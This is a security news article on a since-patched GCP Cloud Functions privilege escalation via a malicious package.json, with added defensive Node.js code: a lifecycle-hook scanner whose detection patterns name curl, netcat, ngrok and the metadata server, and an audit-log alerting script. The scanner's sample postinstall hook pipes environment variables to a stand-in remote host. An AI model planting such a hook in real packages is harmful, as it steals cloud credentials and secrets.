Flaw in Google Cloud Functions Sparks Broader Security Concerns


A potential privilege escalation flaw affecting Google Cloud Platform (GCP) Cloud Functions and its Cloud Build service has been identified and investigated by security researchers.

The issue, initially discovered by Tenable Research, allowed attackers to exploit the deployment process of GCP Cloud Functions to gain elevated permissions.

Google has since issued a patch to mitigate the excessive privileges previously granted to default Cloud Build service accounts.

Attack Technique Repurposed Across Cloud Environments

Cisco Talos recently expanded upon Tenable’s findings by replicating the attack technique and testing its impact across multiple cloud platforms.

Researchers set up a Debian server in GCP with Node Package Manager (NPM) and Ngrok, using a malicious package.json file to extract tokens and simulate an attack. They confirmed that Google’s patch has neutralized the original privilege escalation vector.

However, Talos demonstrated that the same approach could be adapted to perform environment enumeration – a reconnaissance tactic useful for mapping systems – even without privileged access.

By deploying the altered package.json in AWS Lambda and Azure Functions, Talos verified the tactic’s broader applicability across cloud services.
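The technique described above hinges on a package.json whose install-time lifecycle script runs inside the build and reaches out to the network, which is also why the mitigation list further down recommends validating external NPM packages. The following is an added example, not code from Talos, Tenable or Google: a small Node.js checker that parses a package.json, inspects the lifecycle hooks NPM runs during installation, and flags scripts that combine outbound network use with access to environment variables, tokens or the cloud metadata server. The hook names are NPM's real lifecycle scripts; the indicator patterns, the verdict thresholds and both sample package.json documents are constructed for the example.

```javascript
// Added example (not Talos/Tenable/Google code): flag package.json lifecycle
// scripts that look like install-time credential exfiltration.

// Scripts NPM executes automatically during `npm install` of a dependency.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Heuristic indicators (our own labels, not an official list).
const INDICATORS = [
  { name: 'outbound-http', re: /\b(curl|wget)\b/ },
  { name: 'tunnel', re: /\bngrok\b/ },
  { name: 'raw-socket', re: /\b(nc|ncat|netcat)\b/ },
  { name: 'metadata-server', re: /metadata\.google\.internal|169\.254\.169\.254/ },
  { name: 'env-dump', re: /\benv\b|printenv|process\.env/ },
  { name: 'token-reference', re: /token|credential/i },
  { name: 'encoding', re: /base64/i },
];

const NETWORK = ['outbound-http', 'tunnel', 'raw-socket'];
const SECRETS = ['env-dump', 'token-reference', 'metadata-server'];

// Parse a package.json string and return every lifecycle hook that matches an indicator.
function scanPackageJson(text) {
  let pkg;
  try {
    pkg = JSON.parse(text);
  } catch (e) {
    return { ok: false, error: 'invalid JSON', findings: [] };
  }
  const scripts = (pkg && typeof pkg.scripts === 'object' && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const hits = INDICATORS.filter((i) => i.re.test(cmd)).map((i) => i.name);
    if (hits.length) findings.push({ hook, command: cmd, indicators: hits });
  }
  return { ok: true, name: pkg.name, findings };
}

// Turn findings into a policy decision: block when one install-time hook both
// talks to the network and touches environment/token material, review on any
// other indicator, allow when no hook matched.
function verdict(result) {
  if (!result.ok) return 'reject';
  const high = result.findings.some(
    (f) => f.indicators.some((n) => NETWORK.includes(n)) &&
           f.indicators.some((n) => SECRETS.includes(n)),
  );
  if (high) return 'block';
  return result.findings.length ? 'review' : 'allow';
}

// Constructed samples; neither is a real published package.
const SUSPICIOUS = JSON.stringify({
  name: 'constructed-suspicious-package',
  version: '1.0.0',
  scripts: { postinstall: 'env | curl -s -X POST --data-binary @- https://collector.example.invalid/' },
});
const BENIGN = JSON.stringify({
  name: 'constructed-benign-package',
  version: '1.0.0',
  scripts: { build: 'tsc -p .', test: 'node --test' },
});

for (const sample of [SUSPICIOUS, BENIGN]) {
  const r = scanPackageJson(sample);
  console.log(r.name, verdict(r), JSON.stringify(r.findings));
}
```

Running the check against every package.json pulled into a build (for example as a step before the build invokes `npm install`) turns the advice to "validate external NPM packages" into something concrete: a package whose postinstall hook pipes the environment to a remote host is blocked, while a package that merely runs a build step is allowed. A `review` verdict is deliberately noisy so that a human looks at hooks that decode base64 or mention tokens without an obvious network call.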


Enumeration Techniques Observed

The research highlighted several enumeration methods attackers could use to gather valuable system and network information:

  • ICMP discovery for network mapping
  • Detection of .dockerenv files to confirm containerized environments
  • CPU scheduling checks to identify init systems
  • Container ID and mount point analysis for potential escape techniques
  • Operating system and kernel detail extraction
  • User and permission scans to aid privilege escalation
  • Network traffic analysis for vulnerability assessment

These techniques require no privileged credentials, so they remain viable even in environments where service accounts are correctly limited.

Google Responds and Mitigation Measures Advised

Following Tenable’s report, Google modified Cloud Build’s behavior and added new policies for more granular service account control. Talos verified that exfiltration of service account tokens using this method is no longer feasible in GCP.

To defend against similar threats, organizations are advised to:

  • Enforce the principle of least privilege for all service accounts
  • Regularly audit and monitor permissions
  • Alert on unexpected Cloud Function modifications
  • Inspect outgoing traffic for signs of exfiltration
  • Validate the integrity of external NPM packages
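One of the recommendations above, alerting on unexpected Cloud Function modifications, can be implemented against the Admin Activity audit log that GCP writes for Cloud Functions API calls. The following is an added example, not Google's or Talos's code: it reads audit log entries exported as JSON lines, keeps only Cloud Functions create/update calls, and raises a HIGH alert when the caller is not on an allowlist of approved deployer identities. The `methodName` strings are the ones the Cloud Functions v1 and v2 APIs record in audit logs as far as the author knows (verify them against your own log export); the allowlist, project names, IP addresses and sample entries are constructed.

```javascript
// Added example (not Google's or Talos's code): alert on Cloud Function
// deployments by identities that are not approved deployers.

// Audit-log methodName values for function create/update (assumed; confirm in your logs).
const DEPLOY_METHODS = new Set([
  'google.cloud.functions.v1.CloudFunctionsService.CreateFunction',
  'google.cloud.functions.v1.CloudFunctionsService.UpdateFunction',
  'google.cloud.functions.v2.FunctionService.CreateFunction',
  'google.cloud.functions.v2.FunctionService.UpdateFunction',
]);

// Identities expected to deploy functions (constructed allowlist).
const APPROVED_DEPLOYERS = new Set([
  'ci-deployer@example-project.iam.gserviceaccount.com',
]);

// Evaluate one parsed audit log entry. Returns null for entries that are not
// deployments, otherwise an object describing the event and its severity.
function checkAuditEntry(entry) {
  const p = entry && entry.protoPayload;
  if (!p || !DEPLOY_METHODS.has(p.methodName)) return null;
  const principal = p.authenticationInfo && p.authenticationInfo.principalEmail;
  const unapproved = !APPROVED_DEPLOYERS.has(principal);
  const callerIp = p.requestMetadata && p.requestMetadata.callerIp;
  return {
    severity: unapproved ? 'HIGH' : 'INFO',
    reason: unapproved ? 'function modified by unapproved identity' : 'expected deployment',
    principal,
    method: p.methodName,
    resource: p.resourceName,
    callerIp,
    time: entry.timestamp,
  };
}

// Scan JSON-lines input and return only the HIGH severity alerts.
function scanAuditLog(lines) {
  const alerts = [];
  for (const line of lines) {
    let entry;
    try {
      entry = JSON.parse(line);
    } catch (e) {
      continue; // skip malformed lines rather than failing the whole scan
    }
    const a = checkAuditEntry(entry);
    if (a && a.severity === 'HIGH') alerts.push(a);
  }
  return alerts;
}

// Constructed sample entries in the shape of a Cloud Audit Log JSON export,
// trimmed to the fields this check reads.
const SAMPLE_LOG = [
  JSON.stringify({
    timestamp: '2025-05-01T10:00:00Z',
    protoPayload: {
      methodName: 'google.cloud.functions.v2.FunctionService.UpdateFunction',
      authenticationInfo: { principalEmail: 'ci-deployer@example-project.iam.gserviceaccount.com' },
      resourceName: 'projects/example-project/locations/us-central1/functions/api',
      requestMetadata: { callerIp: '203.0.113.10' },
    },
  }),
  JSON.stringify({
    timestamp: '2025-05-01T10:05:00Z',
    protoPayload: {
      methodName: 'google.cloud.functions.v2.FunctionService.UpdateFunction',
      authenticationInfo: { principalEmail: 'someone@example.com' },
      resourceName: 'projects/example-project/locations/us-central1/functions/api',
      requestMetadata: { callerIp: '198.51.100.7' },
    },
  }),
  JSON.stringify({
    timestamp: '2025-05-01T10:06:00Z',
    protoPayload: {
      methodName: 'google.cloud.functions.v2.FunctionService.GetFunction',
      authenticationInfo: { principalEmail: 'someone@example.com' },
    },
  }),
  'not json at all',
];

console.log(scanAuditLog(SAMPLE_LOG));
```

Only the second sample entry produces an alert: the first is the approved CI identity, the third is a read-only `GetFunction` call, and the fourth is discarded as malformed. In practice the same logic runs as a log sink consumer or a scheduled query; the important design choice is keying the allowlist on the deploying identity rather than on the source IP, since a build pipeline abused through a malicious package would still call the API from Google's own infrastructure.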

Though Google has addressed the original flaw, the research underscores the persistent risk posed by overly permissive configurations and the importance of continuous security monitoring across cloud environments.

Image credit: Algi Febri Sugita / Shutterstock.com


